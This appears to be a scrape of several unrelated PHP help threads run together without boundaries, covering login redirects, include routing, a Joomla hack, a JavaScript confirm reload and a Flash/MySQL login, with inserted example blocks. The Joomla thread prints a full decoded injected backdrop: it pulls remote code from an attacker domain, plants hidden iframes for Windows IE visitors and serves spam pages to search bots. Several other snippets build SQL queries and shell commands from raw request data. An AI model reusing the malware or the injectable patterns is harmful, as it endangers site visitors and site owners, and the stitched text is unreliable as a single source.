I am trying to help someone with their PHP website that renders a blank page. When I troubleshoot, I comment out the code below and then the page works.
// include "checkifuserlogin.php";
// $condition = "";
// $objDreamVacationGallery = new HomePageBanner();
// $data = $objDreamVacationGallery->selectAllRecords($condition, $sort_field, $sort_order, $start, $limit);
I assume this is a database error, but I cannot find where the config file is to see where the database is stored, whether it's local or remote.
The server is a Linux box in AWS.
Checkifuserlogin.php has:
<?php
if( (isset($_SESSION['userid']) && $_SESSION['userid'] != '') && (isset($_SESSION['firsttimelogin']) && $_SESSION['firsttimelogin']=='0') ){
    if($_REQUEST["from"]=="contactus") {
        echo "<script language='JavaScript'>window.location = 'my-account.php'; </script>";
    } else {
        echo "<script language='JavaScript'>window.location = 'page.php?page_id=home'; </script>";
    }
    exit;
}
selectAllRecords:
public function selectAllRecords($condition='', $sort_field='', $sort_order='', $limit_start='', $limit_end=''){
    return parent::select($this->db_table, $condition, $sort_field, $sort_order, $limit_start, $limit_end);
}
?>
Please see the code segment below. I wanted to stop direct access to the loginauth function, so I modified my code as below, and when I try to access it directly it echoes the error. But the problem is that when I try to log in via the login page it also generates the same error. Could anyone help me, please?
public function loginauth()
{
    if (defined('base_url')) {
        $this->load->model('Employ_model');
        $this->Employ_model->loginauth();
        $count = $this->db->affected_rows();
        if (($this->session->userdata('privilages')) && ($this->session->userdata('id')) && ($count > 0)) {
            redirect('admin/appliedJobs');
        } else if (($this->session->userdata('id')) && ($count > 0)) {
            redirect('admin/jobsactive');
        } else {
            $this->login();
        }
    } else {
        echo "
        <script>
        alert('Direct access not allowed');
        window.location.href = 'http://localhost/hr/hr/index.php/admin/jobsactive';
        </script>";
    }
}
Still trying to get how PHP works :)
Kindly help me with one solution & idea, here is what I'm using:
<?php
$content = array(
'id01'=>'sub_id01.php',
'id02'=>'sub_id02.php'
);
if(in_array($_GET['show'], array_keys($content))) {
include($content[$_GET['show']]);
} else {
include('sub_id00.php');
}
?>
and:
<?php
$content = array(
'id00'=>'N/A',
'id01'=>'ID01',
'id02'=>'ID02',
);
if(!empty($_GET['show']) && isset($content[$_GET['show']])) {
echo $content[$_GET['show']];
} else {
echo $content['id00'];
}
?>
Where the first example includes pages and the second includes simple code inside ''.
The problem is that if there is no ID set (index.php) it shows the default page/code. And if a wrong ID is set, it'll also show the default page/code.
How can I update it so that without any ID set it would show the default page, and if some wrong ID is set, it would show some error page/code?
Cheers!
UPDATE!
After a while reading, I've updated it with:
<?php
$content = array(
'id01'=>'sub_id01.php',
'id02'=>'sub_id02.php'
);
if (in_array($_GET['show'], array_keys($content)))
{
include($content[$_GET['show']]);
}
elseif (isset($_GET['show']))
{
include('sub_error.php');
}
else {
include('sub_id00.php');
}
?>
And:
<?php
$content = array(
'error'=>'error msg',
'id00'=>'N/A',
'id01'=>'ID01',
'id02'=>'ID02',
);
if(!empty($_GET['show']) && isset($content[$_GET['show']]))
{
echo $content[$_GET['show']];
}
elseif (isset($_GET['show']))
{
echo $content['error'];
}
else
{
echo $content['id00'];
}
?>
:)
$content = array(
    'id01'=>'sub_id01.php',
    'id02'=>'sub_id02.php'
);
if (isset($_GET['show']))
{
    if (array_key_exists($_GET['show'], $content))
    {
        //$_GET id is set and it exists in content
        include($content[$_GET['show']]);
    }
    else
    {
        //$_GET id is set but does not exist in content
        //include whatever page you have for a wrong id here
    }
}
else
{
    //else no $_GET was set
    //include default page
}
For a week I have been trying to log in to the back end of my Joomla 1.5 site. It simply keeps coming back to the login page without any error. When I took a look at the configuration.php file, it appeared as a string encoded with the following pattern:
<?php eval(base64_decode('string here';))) />
When I decoded it using an online service, this is what it appears to be:
if (!defined('frmDs')){ define('frmDs' ,1); function frm_dl ($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = #file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) #unlink($f); else #touch($f); } else { if($fp = #fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = #file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot($ua){ if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = #fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = #strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) 
if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.d.y')); $odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400)); if (file_exists($odbf)) #unlink($odbf); if(strpos(frm_crpt(#file_get_contents($dbf)),$ip) === false ){ if ($fp=#fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } $tdir = frm_tmpdir(); $defframe = '<style> .gtvvh { position:absolute; left:-760px; top:-927px; }</style><div class="gtvvh"><iframe src="http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.latest.js" width="477" height="435"></iframe></div>'; $defrdg='http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.js'; $codelink = 'http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.latest.js'; $rdglink='http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.js'; $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot($ua); if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){ error_reporting(0); if(!isset($_COOKIE['__utmfr'])) { if(!$codelink) print($defframe); else print(frm_getcache($tdir,$codelink,15)); #setcookie('__utmfr',rand(1,1000),time()+86400*7,'/'); } } //------- $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|.*\.edu)$/', $host)){ $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host)))),0,3); $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; $ruri = strtolower($_SERVER['REQUEST_URI']); if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&p=$pageid&pa=$parg",60*48,false)); exit(); } if ($isb) { error_reporting(0); print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&pa=$parg&g=".(($ruri=='/'||$ruri=='/index.php')?'1':'0'),60*48,false)); } 
} //---------}
I checked other Joomla installations on my hosting space and see that all the configuration.php files are the same.
What to do?
Please help
The only thing the configuration.php file should have is defined variables. Nothing else. It could very well be that someone has hacked your site and messed around with files.
Change all passwords that are related to your website, including the hosting one.
Take a backup of your site via the cPanel and scan it with some antivirus software. Assuming there are no viruses detected, upgrade your site to the latest of the Joomla 2.5 series (2.5.14).
Then, remove the code you showed in your question from the configuration.php file and try logging back into the Joomla admin panel. If it works, ensure all your extensions are up to date and read this:
Joomla! 2.5.4 Hacked: Having trouble with diagnosis.
If not, then try resetting your super user password via the database:
http://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F
UPDATE:
It seems your whole configuration.php file has been attacked. I have provided you with the code for the file, however there are some blank spaces to be filled in. Anything that does need filling in, I have written next to it:
http://pastebin.com/gWWtCAJR
Let me know how it goes :)
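Added example, not part of the original answer: a PHP check for the rule stated above, that configuration.php should contain only variable definitions. It tokenises the file and reports anything else, such as the eval(base64_decode(...)) wrapper from the question; the function names and the two sample strings are constructed for illustration.

```php
<?php
// Added example, not from the original thread; names and samples are constructed.

/** List every construct in $source that a plain settings class does not need. */
function config_violations(string $source): array
{
    $allowed = [T_OPEN_TAG, T_CLOSE_TAG, T_CLASS, T_STRING, T_VAR, T_PUBLIC,
        T_VARIABLE, T_ARRAY, T_DOUBLE_ARROW, T_CONSTANT_ENCAPSED_STRING,
        T_LNUMBER, T_DNUMBER];
    $skipped = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    $found = [];
    $prev = null; // last significant multi-character token, or null
    foreach (token_get_all($source) as $tok) {
        if (!is_array($tok)) {
            // Single-character token: '(' directly after a name is a call.
            if ($tok === '(' && $prev !== null && $prev[0] === T_STRING) {
                $found[] = "call to {$prev[1]}() on line {$prev[2]}";
            }
            $prev = null;
            continue;
        }
        if (in_array($tok[0], $skipped, true)) { continue; }
        if (!in_array($tok[0], $allowed, true)) {
            $found[] = token_name($tok[0]) . " on line {$tok[2]}";
        }
        $prev = $tok;
    }
    return $found;
}

/** Check every configuration.php below $root, e.g. all sites in one account. */
function scan_configs(string $root): array
{
    $report = [];
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($walker as $file) {
        if ($file->isFile() && $file->getFilename() === 'configuration.php') {
            $hits = config_violations((string) file_get_contents($file->getPathname()));
            if ($hits) { $report[$file->getPathname()] = $hits; }
        }
    }
    return $report;
}

// Constructed samples: a clean settings class and the wrapper from the question.
$clean = "<?php\nclass JConfig {\n\tvar \$offline = '0';\n}\n";
$infected = "<?php eval(base64_decode('cGxhY2Vob2xkZXI='));\n";
print_r(['clean' => config_violations($clean), 'infected' => config_violations($infected)]);
if (isset($argv[1])) { print_r(scan_configs($argv[1])); }
```

Passing a directory as the first command-line argument runs the same check over every configuration.php below it, which covers the case of several installations in one hosting space.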
I'm using PHP and JavaScript, and I have a problem when dealing with the confirm() function in JavaScript.
Say I have a page add.php. First I receive some parameters passed from another page, and I check to see if they are valid or not. If yes, I just insert the data into the db and return to another page; if they are not valid, a confirm() window pops up and lets the user choose whether to continue or not. If the user still chooses to continue, I want the page to be reloaded with all the parameters sent again. But the problem is that I cannot get the parameters the second time add.php is loaded.
Previously I didn't use a window.onload function and confirm() pop-up, but an <a href> link instead, and everything worked fine (please see the attached code at the end). But when I tried to use the following code, the same URL stopped working:
echo "<script type=\"text/javascript\">";
echo "window.onload = function() {
var v = confirm(\"$name is not alive, do you want to add it into system?\");
if (v) {
window.location.href= \"add.php?type=room&name=$name&area\"
+ \"=$area&description=$description&\"
+ \"capacity=$capacity&confirm=Y\";
} else {
window.location.href= \"admin.php?area=$area\";
}
}";
echo "</script>";
Following is the previous version. Instead of using window.onload(), I used an <a href="..." /> link, and everything worked fine at that time. get_form_var is a function in functions.inc, which gets the parameter using the $_GET array.
<?php
require_once "functions.inc";
// Get non-standard form variables
$name = get_form_var('name', 'string');
$description = get_form_var('description', 'string');
$capacity = get_form_var('capacity', 'string');
$type = get_form_var('type', 'string');
$confirm = get_form_var('confirm','string');
$error = '';
// First of all check that we've got an area or room name
if (!isset($name) || ($name === ''))
{
$error = "empty_name";
$returl = "admin.php?area=$area"
. (!empty($error) ? "&error=$error" : "");
header("Location: $returl");
}
// we need to do different things depending on if its a room
// or an area
elseif ($type == "area")
{
$area = mrbsAddArea($name, $error);
$returl = "admin.php?area=$area"
. (!empty($error) ? "&error=$error" : "");
header("Location: $returl");
}
elseif ($type == "room")
{
if (isset($confirm)){
$dca_osi = getOsiVersion($name);
$room = mrbsAddRoom(
$name,
$area,
$error,
$description,
$capacity,
$dca_osi,
1
);
$returl = "admin.php?area=$area"
. (!empty($error) ? "&error=$error" : "");
header("Location:$returl");
}
else {
$dca_status= pingAddress($name);
$dca_osi = getOsiVersion($name);
if( $dca_status == 0){
$room = mrbsAddRoom(
$name,
$area,
$error,
$description,
$capacity,
$dca_osi,
0
);
$returl = "admin.php?area=$area"
. (!empty($error) ? "&error=$error" : "");
header("Location:$returl");
}
else {
print_header(
$day,
$month,
$year,
$area,
isset($room) ? $room : ""
);
echo "<div id=\"del_room_confirm\">\n";
echo "<p>\n";
echo "$name is not alive, are you sure to add it into system?";
echo "\n</p>\n";
echo "<div id=\"del_room_confirm_links\">\n";
echo "<a href=\"add.php?type=room&name"
. "=$name&area=$area&description"
. "=$description&capacity=$capacity&confirm"
. "=Y\"><span id=\"del_yes\">"
. get_vocab("YES") . "!</span></a>\n";
echo "<a href=\"admin.php?area=$area\"><span id=\"del_no\">"
. get_vocab("NO") . "!</span></a>\n";
echo "</div>\n";
echo "</div>\n";
}
}
}
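function pingAddress($host)
{
    // $host comes from the request: quote it so it cannot inject shell commands.
    // A value starting with "-" is still read as a ping option, so validate it upstream.
    $pingresult = exec("/bin/ping -c 1 " . escapeshellarg($host), $outcome, $status);
    if ($status==0) {
        return $status;
    }
    else {
        return 1;
    }
}
function getOsiVersion($host)
{
    $community = 'public';
    $oid = '.1.3.6.1.4.1.1139.23.1.1.2.4';
    // same quoting for the host passed to snmpwalk
    $sysdesc = exec("snmpwalk -v 2c -c $community " . escapeshellarg($host) . " $oid");
    $start = strpos($sysdesc, '"');
    if ($start!==false) {
        // text after the opening quote, without the last character (the closing quote)
        $sysdesc = substr($sysdesc, $start+1, -1);
        return $sysdesc;
    }
    else {
        return "not available";
    }
}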
I've solved the problem, just simply by using "&" instead of "&amp;" in the URL link... it works fine now...
Did you try the location.reload() JavaScript call?
I have this code:
btn_jouer.onRelease = function ()
{
verif = txt_email_user.text;
if (txt_email_user.text == "")
{
txt_erreur.textColor = 16724736;
txt_erreur.text = "Champ(s) manquant(s)";
}
else if (verif.indexOf("@", 0) == -1 || verif.indexOf(".", 0) == -1)
{
txt_erreur.textColor = 16724736;
txt_erreur.text = "Adresse E-mail invalide";
}
else
{
php_login = new LoadVars();
php_login.email = txt_email_user.text;
php_login.sendAndLoad(_root.page_Login, php_login, "POST");
php_login.onLoad = function(succes)
{
if (succes)
{
//txt_erreur.text = php_login.etat;
//return;
if (php_login.etat == "exist")
{
_root.var_user.id = php_login.id;
_root.var_user.nom = php_login.nom;
_root.var_user.prenom = php_login.prenom;
_root.var_user.score = php_login.score;
_root.MovieLogin.unloadMovie();
if (_root._root.selectedPhone == "KS360")
{
_root.gotoAndStop(4);
}
else
{
_root.gotoAndStop(3);
} // end else if
}
else if (php_login.etat == "non")
{
trace (php_login.etat);
txt_erreur.text = "Email non enregistré! veuillez vous s'inscrir";
} // end if
} // end else if
};
} // end else if
};
The "page_Login" is the login.php file on the server.
After debugging, the file login.php successfully received the posted data, so I got:
$_POST['email'] = "what ever you type in swf form";
The login.php processor file:
if(isset($_REQUEST['email'])){
    $email = strtolower(addslashes($_REQUEST['email']));
    $DB->_request("select * from gamers where email='$email'");
    if($DB->_nr() > 0) {
        $row = mysql_fetch_array($DB->Result);
        echo "&etat=exist&nom={$row['nom']}&prenom={$row['prenom']}&score={$row['score']}";
        //
        exit;
    }
    else {
        echo "&etat=non";
        exit;
    }
}
Here above, the $DB->_nr() always returns "0" even though the email address exists!
I have tried to create a simple HTML page having a form with method POST and a simple input of type text with name="email".
When I write my email, which is valid in the database, and hit submit, $DB->_nr() returns 1.
This really is driving me crazy. I'm sure that the email address exists, the login.php page receives the posted data "email = validemail@domain.com" from sendAndLoad(), but mysql_num_rows returns 0.
Has anyone had the same issue?
Any help would be so much appreciated!
Barry,
Use the following code in PHP to compare the email in both cases: given from flash and from HTML form:
if(isset($_REQUEST['email'])){
    // create testFile.txt and give it 0777 permissions (in case you are under Linux)
    $myFile = "testFile.txt";
    $fh = fopen($myFile, 'a') or die("can't open file");
    fwrite($fh, "-".$_REQUEST['email']."-\r\n");
    fclose($fh);
    $email = strtolower(addslashes($_REQUEST['email']));
    $DB->_request("select * from gamers where email='$email'");
    if($DB->_nr() > 0) {
        $row = mysql_fetch_array($DB->Result);
        echo "&etat=exist&nom={$row['nom']}&prenom={$row['prenom']}&score={$row['score']}";
        //
        exit;
    }
    else {
        echo "&etat=non";
        exit;
    }
}
If you test for both of the cases, you will be able to compare the two exact forms. I have put "-" at the front and the end of it just to see if there are any whitespaces next to the email value.
Please reply with a compare result. Thank you.
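Added example, not part of the original thread: a way to make invisible bytes in the posted e-mail visible and to run the lookup with a bound parameter instead of addslashes(). It assumes the pdo_sqlite extension; the in-memory table, its row and both inputs are constructed, and the trailing carriage return is hypothetical, since the thread does not establish the actual cause.

```php
<?php
// Added example, not from the original thread. Assumes pdo_sqlite is available;
// the table, row and inputs below are constructed to mirror the `gamers` lookup.

/** Render a value so invisible bytes (CR, LF, NBSP, ...) show up in a log. */
function visible_bytes(string $value): string
{
    return sprintf('len=%d hex=%s', strlen($value), bin2hex($value));
}

/** Look up a gamer by e-mail with a bound parameter instead of addslashes(). */
function find_gamer(PDO $db, string $rawEmail): ?array
{
    // Normalise once, at the boundary: strip surrounding whitespace, lower-case.
    $email = strtolower(trim($rawEmail));
    $stmt = $db->prepare('SELECT nom, prenom, score FROM gamers WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE gamers (email TEXT PRIMARY KEY, nom TEXT, prenom TEXT, score INTEGER)');
$db->exec("INSERT INTO gamers VALUES ('player@example.com', 'Doe', 'Jane', 42)");

// Constructed inputs: a clean form value and one with a hypothetical trailing CR.
$fromForm  = 'player@example.com';
$fromFlash = "Player@Example.com\r";

foreach (['form' => $fromForm, 'flash' => $fromFlash] as $label => $raw) {
    $state = find_gamer($db, $raw) ? 'exist' : 'non';
    echo $label, ': ', visible_bytes($raw), ' => ', $state, "\n";
}
```

The hex form shows a stray byte that the dash-delimited log line can hide, and the bound parameter removes the need to escape the value by hand.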